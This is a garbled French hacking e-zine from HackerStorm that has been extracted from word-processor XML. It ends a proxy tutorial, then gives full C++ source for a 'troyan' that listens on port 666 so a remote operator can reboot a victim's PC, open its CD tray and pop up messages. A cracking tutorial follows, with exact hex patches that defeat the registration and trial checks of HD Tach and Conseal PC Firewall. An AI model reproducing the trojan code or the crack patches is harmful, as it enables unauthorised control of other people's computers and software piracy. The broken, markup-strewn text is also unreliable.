lors de l'enregistrement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mettons la variable Connect à 0 et nous nous connectons au server défin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2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2.Accept requestI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Winsock2.RemoteHostIP &lt;&gt; vip Then Winsock2.Close: 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Connect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Connect ip, por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1_Error(ByVal Number As Integer, Description As String, ByVal Scode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Source As String, ByVal HelpFile As String, ByVal HelpContext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CancelDisplay As Boolea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une erreur intervient dans winsock1,  nous fermons les connections server et client et nous mettons etape à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2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tap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2_Error(ByVal Number As Integer, Description As String, ByVal Scode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Source As String, ByVal HelpFile As String, ByVal HelpContext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CancelDisplay As Boolea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 Si une erreur intervient dans winsock2,  nous fermons les connections server et client et nous mettons etape à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2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tap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 pour le proxy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tte source vous permet de connecter un client mais vous pouvez modifier la sour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 y mettant des index pour que le proxy prenne autant de client que vous le souhaitez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ancez maintenant un client simple qui envoye du texte brut ou tout simplement votre client IRC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nnectez-vous au proxy sur le port 1080. Envoyez le pass qui est "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Proxy by KOP for HackerStorm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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e fois ceci envoyé, envoyé l'IP ou le nom du server auquel le proxy doit se connecter. ex : "ircnet.grolier.net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envoyez pour finir le N° du port  auquel le proxy doit se connecter. ex : "6667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server devrait vous envoyer "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Connectez vous sur le port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>" + le port auquel vous devez vous connect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utiliser le proxy. Dans l'exemple d'IRC, pour vous connectez, lancez votre client IRC et tapez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/server [ip du proxy] [port d'utilisation du proxy]. Ceci vous connectera au proxy et le proxy se connecter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utomatiquement à "ircnet.grolier.net" sur le port 6667. Les données envoyé au proxy seront retransmis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le proxy effectue donc bien son boulo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4- Programmer un troyan en c++ par TiPia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     A - Qu'est-ce qu'un troyan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'est un programme qui une fois executé sur l'ordinateur de votre victi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permet de contrôler son système. Celui que nous programmerons sera fa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windows pour donner la base de la programmtion socket en C/C++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aux débutants.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 troyan fonctionne sous la forme d'une application client-serv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est en fait composé de 2 fichiers exécutables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Le server = programme a lancer sur la victi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Le client = centre de controle a lancer sur vous-mê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s: j'espère que vous saviez au moins ceci, mais bon on ne sait jamais ;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tout ce qui est partie réseau, nous utilisons les socke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     B - Comment programmer en C++ windows une application client-server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8000"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>le ser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Il faut tout d'abord initialiser le système des socke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créer un so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remplir une structure sockaddr_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binder ( lier ) le socket à la structu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5) mettre le socket en listen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6) accépter une connection d'un client avec accept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7) détruire le so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8) libérer winso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8000"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>le cli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initialiser le système des socke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créer un so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connecter a l'ho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envoyer le so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5) fermer la connection en détruisant le socket et en libérant winso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tout ceci il faudra inclure "winsock.h" et linker avec wsock32.li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a c'est prê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assons à la programmation proprement dite du serv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mmençons par inclure "winsock.h"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FF"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>#include &lt;winsock.h&g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ous déclarons nos structures sockaddr_in et nous créons "len" qui contient la taille d'un structur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struct   sockaddr_in sin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struct   sockaddr_in info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int len = sizeof(SOCKADDR_I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suite nous passons a l'initialisation de winsock en déclarant que nous voulons la version 1.1 minimum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WSADATA wsaData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WORD verreq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verreq=MAKEWORD(2,2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WSAStartup(verreq,&amp;wsaData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AKEWORD est une fonction de winsock qui permet de donner la vers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 asm, préférez faire un décalage de bits (voir counterstrike3 - troya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 asm par obscurer ! bonjour a vous au passage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is la création d'un socke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SOCKET s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s=socket(AF_INET, SOCK_STREAM, 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le remplissage d'une structure sockaddr_in pour donner les propriétées de nos socket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FF"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">sin.sin_family = PF_INET;             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>//toujours PF_INET sous window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FF"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">sin.sin_addr.s_addr = NULL;        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>//on connait pas l'ip du cli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FF"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">sin.sin_port = htons(12345);          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t xml:space="preserve">//htons donne la valeur correspond au port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FF"/>
        </w:rPr>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>//en NETWORK BYTE ORD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is nous bindons(lier) le socke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if (bind (s,(struct sockaddr *)&amp;sin,len)==SOCKET_ERROR)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is nous le mettons en écout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if (listen(s,1)==SOCKET_ERROR)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nous attendons une connection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SOCKET so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sok=accept(s,(struct sockaddr *)&amp;info,&amp;le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if (sok == INVALID_SOCKET)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k sera la socket accepté et info la structure sockaddr_in qui lui correspond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près nous envoyons ce que nous voulons grâce a la fonction send(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recevoir nous utilisons recv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 la fin ou en cas d'erreur nous nettoyons tou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fin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closesocket(s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>WSACleanup(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'est assez difficile à comprendre si vous ne connaissez pas très bien le C/C++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illustrer tout ceci rien de mieux qu'un exemp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ci donc le source de mon troyan  en C++. Et si vous voulez une autre sour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regardez mon émulateur NetBus qui est tout simple. Allez voila le sour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u server.(n'oubliez pas de linker wsock32.lib en faisant sous vc++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oject-&gt;settings-&gt;link et rajoutez wsock32.lib au début de la liste ains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e winmm.lib qui est utilisée ici pour ouvrir le lecteur cd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 troyan n'est pas très évolué mais il est relativement simple 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'améliorer.(les exes sont joints pour ceux qui n'ont pas VC++ ou le compilateu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a source du client est joint pour ne pas surcharger le mag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           C - La source du server Troya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/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/ EnCuLaToR TroYaN par TiPiaX - HackerStorm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/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#include &lt;stdio.h&g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#include &lt;winsock.h&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  //pour les sock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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//prototyp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troyan(void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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//variab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OCKET   s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OCKET   so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WSADATA  wsaData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WORD     verreq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truct   sockaddr_in sin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truct   sockaddr_in info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len = sizeof(SOCKADDR_I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char signature[]="EnCuLaToR v0.1\r\n";  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  //&lt;&lt;signatu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recu =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char buf[20]; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//buffer pour recevoir des data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message[]="reboot\r\n"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open[]="open\r\n"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close[]="close\r\n"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beep[]="beep\r\n"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chat[]="chat\r\n"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parole[10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titre[10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ENTRY POINT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WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInst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 xml:space="preserve">   LPSTR lpCmdLine, int nCmdShow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troyan(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turn (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!§ TROYAN §!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troyan(void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initialisation du système de sockets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verreq=MAKEWORD(2,2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WSAStartup(verreq,&amp;wsaData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remplissage de la structure sockaddr_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in.sin_family = PF_INE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in.sin_addr.s_addr = NULL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in.sin_port = htons(666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création d'un socke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 = socket(PF_INET, SOCK_STREAM, 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bind le so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 (bind (s,(struct sockaddr *)&amp;sin,len)==SOCKET_ERROR)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socket en ecoute de connec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 (listen(s,1)==SOCKET_ERROR)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onrepar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accepte la connec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ok=accept(s,(struct sockaddr *)&amp;info,&amp;le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 (sok == INVALID_SOCKET)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end(sok,signature,strlen(signature),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ici tout est bon, il n'y a plus qu'a recevoir les messages du clien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nt comparaison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cu =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 xml:space="preserve">while (recv(sok,buf,sizeof(buf),0)!=0) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>// boucle tant que la connection exis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comparaison = lstrcmp(buf,messag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f (comparaison==0)ExitWindowsEx(EWX_REBOOT,NULL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comparaison = lstrcmp(buf,ope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f (comparaison==0)mciSendString("Set cdaudio door open wait",0,0,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comparaison = lstrcmp(buf,clos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f (comparaison==0)mciSendString("Set cdaudio door closed wait",0,0,0);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comparaison = lstrcmp(buf,beep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f (comparaison==0)Beep(NULL,NULL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ab/>
        <w:t>//boite de messag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comparaison = lstrcmp(buf,chat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f (comparaison==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>if(recv(sok,titre,sizeof(titre),0)!=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if(recv(sok,parole,sizeof(parole),0)!=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MessageBox(NULL,parole,titre,MB_OK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memset(&amp;info,0,sizeof(SOCKADDR_IN)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closesocket(sok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goto onrepar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rror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nt nombre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char buffer[3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nombre=WSAGetLastError(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printf(buffer,"%d",nombr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MessageBox(NULL,buffer,"ERROR : WSAGetLastError :",MB_OK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closesocket(s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WSACleanup(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ExitProcess(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 troyan peut même servir sans créer de client. En effet il suffit de se connect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vec telnet sur le port 666 et d'écrire des messages tels que: "reboot"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etite remarqu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le système de boite de message, il faut envoyer "chat" au serv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lui-ci attendra que vous lui envoyer le titre puis ensuite le messag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si vous voulez que je continue ce troyan mailez-moi et donnez-moi l'inspiration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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>*</w:t>
      </w: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color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">CRACKING par Tipiax       </w:t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  <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>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1 - Explications sur le cracking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ut a tous, moi je vais tenter de vous expliquer les bases du cracking. Ce cours s'adresse donc au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ébutants en la matière. Tout d'abord il faut bien mettre les choses au point : quesque le cracking ?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h Bien c'est simple, vous avez du remarquer que certains logiciels étaient limités a une certain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ériode d'utilisation (les sharewares) ou alors que certains jeux, une fois copiés vous indiquen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 votre CD n'est pas valide ! Eh bien le but du cracking est de modifier la source du programm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enlever les vérifications d'authenticités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s comment peut-on procéder pour réaliser une telle chose ?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faut tout d'abord se familiariser avec un language appellé l'assembleur (asm). Ce language est la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uction des instructions qui sont envoyées au processeur lors de l'éxécution d'un programme. Il no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udra trouver dans le programme un test quelque part qui regarde si notre logiciel est REGISTER ou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 notre CD est valide dans le cas d'un jeu et il ne restera plus qu'a modifier ce test a notre convenanc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pouvoir vous adonner a cette discpline qu'est le cracking il faut tout d'abord posséder un certain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mbre de logiciels. Vous aurez besoin de certains programmes indispensables. En voici une liste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On verra leur utilité dans ce qui va suivre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W32dasm  -  un désassembleur idéal pour débute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SOFTice4  -  Le débugger de NuMega - INDISPENSABLE !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Un éditeur hexadécimal tel que FxEdit ou HexWorkshop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Procdump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Borland resource workshop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essayez : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">http://www.crackstore.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pour les trouver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 vais vous expliquez l'utilité du désassembleur et du débugger par la suite mais commençons déja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 l'éditeur hexadecimal. Tout programme informatique est en fait une suite de 0 et de 1. Pour que ce soit pl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réhensible, nous pouvons le lire en hexadecimal. L'hexadecimal est une numérotation avec une base de 16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s rassurez vous, vous n'aurez pas besoin de savoir convertir les bits en hexa. Les opcodes en hexadécimal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respondent à ce qui est envoyé réellement au processeur. Nous chercherons donc a comprendre l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fonctionnement d'un programme en regardant sa traduction en assembleur (car ce language es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réhensible par l'homme contrairement a l'hexadécimal) puis lorsque nous aurons trouvé ou il faut agi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prendrons l'éditeur hexadécimal et nous modifierons ce que bon nous sembl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convient donc d'apprendre déjà quelques instructions et leurs correspondance en hexa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s plus utilisées lors de vos débuts seront les instructions de saut. Elles permettent de déplacer le pointeu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'execution vers un endroit du programme en fonction d'une condition(cela peut aussi être un saut prédéfini)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 saut basique est l'instruction JMP(saut prédéfini) qui correspond a EB en hexadécimal (il existe aussi E9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 le saut est plus long)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is la plupart des sauts rencontrés seront conditionnels. C'est à dire qu'ils sauteront si une condition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éterminée au dessus est vrai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 exemple le saut JE ne sautera que si les deux valeurs testées aux dessus sont égales ou valent 0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 JE = 74 en hexa)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l'inverse le saut JNE ne saute que lorsque les valeurs sont différentes et non égales a 0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JNE = 75 en hexa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vous sera donc fréquent d'intervertir ces 2 sauts. Prenons un exemple : vous voulez enregistrer un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reware a votre nom. Vous indiquez donc votre nom et un faux numéro. En traçant le programm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voir la partie d'après) vous trouver que c'est un JE qui vous envoie a l'endroit du programme où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elui-ci indique que le code est faux par une boite de message. (genre : "INVALID REGISTRATION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 :!"). Vous devinez donc que ce saut est effectué seulement si votre sérial est faux. En le changean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 un JNE les conditions se veront inversées et lorsque vous entrerez de fausses informations, le programm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ira que votre sérial est bon et ainsi vous aurez accès à toutes les fonctions du logiciel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ssurez vous c'est normal si vous comprenez pas encore tout cela, mais ça va venir, persévérez dans votre apprentissag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2 - Principe de fonctionnement d'un debugger (SoftIce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à nous commençons les choses sérieuses. Nous allons apprendre a se servir de softice et aussi a quoi cela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 nous servir. SOFTice est donc un débugger crée par NuMega qui vaut assez cher (qui a dit qu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us deviez l'acheter :). Il faut tout d'abord que vous l'installiez convenablement. Le process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'installation s'est considérablement amélioré avec le temps si bien que ce sera très simple à installer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us commencez donc par éxécuter le setup.exe puis vous spécifiez quel type de souris vous avez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ps2 ...) puis vous cliquez sur "tester" pour faire accepter votre carte graphique.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pendant il reste une petite manipulation a ne pas oublier. Allez dans votre répertoire de SOFTic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 éditez "winice.dat" avec le bloc-note. Ensuite enlevez tous les ";" devant les EXP=!!!. Cela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et de placer plus de breakpoints (pas de panique je vais vous expliquer ce que c'est)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n voila SOFTice est installé. Il vous suffit de rebooter le pc et si tout a bien fonctionné vous allez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 voir se mettre en route en même temps que windows. Il tournera en fond sans que vous vo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 rendiez compte. Pour l'appeler, rien de plus simple, faites CTRL + D .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ant de rentrer dans les détails voyons plutôt a quoi ce programme va nous servir. Un débugge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rcepte tout le code qui est envoyé au processeur et nous le montre a l'écran quand nous le désirons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nous permet aussi de tracer un programme ligne de code par ligne de code. De plus il converti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 code hexadécimal en assembleur ce qui nous permet de comprendre comment foncionne un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me. Un débugger permet aussi de placer des breakpoints. Un breakpoint est une chose qu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'on place a n'importe quel endroit d'un programme et qui arretera tout le système dès que cet endroi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a lu par le processeur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peut placer aussi des breakpoints sur les APIs de windows. Par exemple si vous placez un breakpoin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 l'api MessageBoxA qui permet l'affichage de boite de messages le système s'arretera dés qu'une boit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messages fera son apparition a l'écran et SOFTice vous montrera où l'appel a cette API a été éffectué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ons directement aux commandes utilisées pour faire fonctionner SOFTice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TRL+D  &gt;&gt; faire apparaitre ou disparaitre SOFTic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5             &gt;&gt; Continuez l'éxécution après un breakpoint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10           &gt;&gt; Tracer pas à pas (step over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8             &gt;&gt; Tracer pas à pas en rentrant dans les calls (step into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12           &gt;&gt; Revenir d'un call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la pour les touches importantes. Voyons maintenant les commandes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r un breakpoint à une adresse :  "bpx &lt;adresse&gt;"     Par exemple : bpx 00405400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r les registres du processeur :        "r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r le code hexadécimal :                     "code on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r la mémoire :                                     "data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r la liste des bpx (breakpoints) posés : "bl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acer un bpx : "bc &lt;numero&gt;"    ou numéro est le chiffre attribué au bp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acer tous les bpx : "bc*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la qui devrait suffir pour le début. Pour de plus amples informations consulter le fichie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'aide qui devrait être disponible sur le site de NuMega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3 - Principe de fonctionnement d'un désassembleu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 désassembleur est l'outil idéal pour débuter quand nous ne maitrisons par encore beaucoup l'asm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 désassembleur tel que W32dasm va lire en héxadécimal le programme a désassemble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is convertir tout le programme en assembleur pour finalement vous afficher le résultat à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'écran. L'avantage de W32dasm est ses "Strings Datas References". En fait ce sont des chaîne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caractères trouvées dans le programme qui se révellent très utiles. Par exemple il n'est pa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re de voir apparaître des phrases telles que "INVALID REGISTRATION CODE" ou encor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ANK YOU FOR REGISTER" qui vous donnent des renseignements sur l'endroit ou nous allons agir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pendant le désassembleur peut paraître assez limité. Il existe des protections contre ceux-ci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 exemple si vous désassemblez un .exe crypté le code sera imcompréhensible (crypté pa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Shield - Aspack etc...). C'est pourquoi nous utilisons le désassembleur que lorsque le programm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à cracker est simple. Sinon l'utilisation du débugger se révèlera bien plus judicieus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ne va pas s'attarder sur tout ceci car je suis sur que vous mourrez d'envie de passer a l'action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4 - Exemple de crack: un programme(niveau débutant)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apprendre il faut commencer par des programmes simples. Alors je sors mon CD de PcTeam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ce mois (un peu de pub :) et je cherche une cible. J'ai mis longtemps à trouver un truc sympa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s il y a un prog qui me paraît bien. Il s'appelle HD TACH et il sert a faire des benchmarks de vos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ques-durs. (je l'ai choisi car il y a un gros bouton "REGISTER" :)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attaque donc le fichier hdtach.exe. Nous cliquons sur le gros bouton "REGISTER" puis dans name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company nous mettons "HackerStorm" puis nous mettons un sérial bidon (beh oui nous le connaissons pas ;) et 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cliquons enfin sur "FINISH". La réponse ne se fait pas attendre :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rror"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egistration code is not valid. Try again"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se fait une copie de l'exe et nous le désassemblons avec W32dasm. Puis nous allons dans les "Strings Datas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ferences". Bingo nous trouvons : "Registration code is not valid. Try again". Nous cliquons dessus et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la ce qui apparait à l'écran :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A8   8D85E0FEFFFF           lea eax, dword ptr [ebp+FFFFFEE0]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AE   E8EDBAFDFF             call 004495A0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B3   3BD8                              cmp ebx, eax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:0046DAB5   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>0F85CA000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">              jne 0046DB85    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt;héhé !!!!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6DABB   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>6A00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">                              push 00000000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BD   668B0DF4DB4600        mov cx, word ptr [0046DBF4]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C4   B202                                mov dl, 02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* Possible StringData Ref from Code Obj -&gt;"HD Tach is now registered.  Write "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                                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-&gt;"test enabled.  Thank you!"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|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C6   B830DC4600                    mov eax, 0046DC30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CB   E87CB6FDFF                  call 0044914C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D0   8D45F0                             lea eax, dword ptr [ebp-10]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D3   50                                      push eax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/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>//puis un peu plus loin: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color w:val="00FF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF00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Referenced by a (U)nconditional or (C)onditional Jump at Address:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;&lt;héhé !!!!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:0046DAB5(C)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B85   6A00                                  push 00000000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B87   668B0DF4DB4600            mov cx, word ptr [0046DBF4]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B8E   B201                                   mov dl, 01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* Possible StringData Ref from Code Obj -&gt;"Registration code is not valid. "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                                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-&gt;" Try again."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|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B90   B8BCDC4600                     mov eax, 0046DCBC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B95   E8B2B5FDFF                    call 0044914C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B9A   EB0D                                 jmp 0046DBA9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 xml:space="preserve">Le saut JNE en 0046DAB5 nous met sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Registration code is not valid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>alors que s'il n'a pas lieu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nous avons </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">HD Tach is now registered.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Il suffit donc d'inverser le saut et ç'est bon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Vous pouvez tester en faisant Debug -&gt; Load Process. Faites Goto code location et mettez l'adress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u code à modifier. Et faites ensuite Patch code. Entrez la fonction qui va remplacer l'ancienn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aites entrer et Apply patch. Faites ensuite Run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e JNE est de la forme 0F85 en hexa. Pour l'inverser nous mettrons 0F84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 xml:space="preserve">Grace à notre éditeur hexadecimal, nous recherchons donc : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0F85CA0000006A00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> que nous changeons en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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0F84CA0000006A00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on rajoute 6A00 pour être sûr de trouver la bonne chaîne hexadécimale. Si vous ne comprenez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s d'où vient cette valeur regardez dans le désassemblage en bleu)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ous relançons, nous nous enregistrons, et ça marche il nous dit merci mais il reste un texte qui dit que no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ommes unregistered. Il y a donc 2 vérifications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egardons deux lignes au dessus de notre JNE :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DAAE   E8EDBAFDFF             call 004495A0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'est la routine qui vérifie si nous sommes registered. Cliquons dessus :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* Referenced by a CALL at Addresses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|:0046DAAE   , :0046FE7B  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 ceci, vous remarquez que 2 adresses appellent la procédure de vérification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ns donc voir à l'adresse 0046FE7B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FE7B   E82097FDFF              call 004495A0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6FE80   3BD8                           cmp ebx, ea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6FE82   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>0F85C6000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">            jne 0046FF4E   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;&lt;&lt;héhé !!!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6FE88   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>BAA8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>FF4600             mov edx, 0046FFA8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........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h oui nous avons exactement la même chose :) Le programme appelle la routine de vérification,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re 2 valeurs puis saute en fonction de celles ci. Il suffit donc, une fois de pl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 xml:space="preserve">d'inverser le saut de la même façon que le premier. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Avec notre éditeur hexadecimal nou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 xml:space="preserve">recherchons donc : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0F85C6000000BAA8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> que nous changeons en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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0F84C6000000BAA8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relancons le programme et celui ci nous indique que nous sommes bel et bien enregistré !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jectif réussi ! Retour a la base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'espère que vous avez compris ce tutorial mais si c'est pas le cas ne passez pas au rest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s bien avoir assimilé cette manipulation de base. En attendant nous allons voir un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re cible mais cette fois ci nous allons utiliser SoftIce en partie car il se révèlera plus approprié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 - Crack de Conseal Pc FireWall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="142" w:leader="none"/>
        </w:tabs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P m'a pourtant dit que les firewalls ne servent pas à grand chose face à un élite. Le miens m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t pas mal et après ce crack que je viens de faire pour vous(ayant du avancer mon horloge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faire des tests) la période d'évaluation de Conseal Pc est terminée :-(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va donc falloir y remédier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lanceons le programme. Il nous affiche une boite de message informations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nSeal Pc FireWall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e trial Period has expired...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avons dit que nous le faisions en partie avec SoftIce. Nous faisons donc CTRL+D pui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nous préparons en tapant ceci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de on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"data"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" (si vous avez un vieux SoftIce)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is nous allons mettre un breakpoint sur cette boite de message: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px messageboxa"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sortons de SoftIce en faisant CTRL+D. Il ne nous reste plus qu'a relancer le programme et à attendre (2 secondes :)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ngo SoftIce break. Voila ce que vous devez voir apparaître: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reak due to bpx USER!32MessageBoxA" mais si vous regardez la ligne verte au dessus il y a marqué :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 USER32!text+322B -------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est donc dans les apis de windows. Revenez dans le prog avec F12 (car l'api est appelée par un call)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 FRW!text+4F0A -------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la c'est bon. Nous regardons l'adresse où nous nous trouvons : 00405F19 puis nous enlevons les breakpoints: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bc*"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serions tenté de le désassembler avec W32dasm, eh bien devinez quoi il, est crypté.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'est là que va nous servir un des meilleurs programmes au monde.... j'ai nommé...... Procdump !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 programme est distribué en tant que freeware. Vous faites PE EDITOR et choisissez FRW.exe.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ez dans sections. Vous voyez : WWP32 à la fin. C'est le crypteur utilisé.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tez tout ça et choississez "UNPACK" puis dans la liste WWPack32 puis ok.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 firewall va se lancer, cliquez alors sur "OK" et laissez faire Procdump. ProcDump décrypte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 programme. Enregistrez le programme décrypté en frwd.exe.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'aurions nous fait sans lui ?Je vous le demande :)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reprenons SoftIce et nous placeons un "bpx messageboxa" mais cette fois ci nous lanceons frwd.exe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 nous regardons où est l'appel à cette boite de message. Cela a pas changé depuis tout à l'heure (ce qui montre qu'en fait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cDump a dumpé l'exe). Arrivé où nous sommes, nous faisons un autre F12 pour remonter car nous ne voyons pas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ucoup de sauts conditionnels. Nous arrivons ici :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5C   6A01                         push 00000001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1135E   E846220100              call 004235A9     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
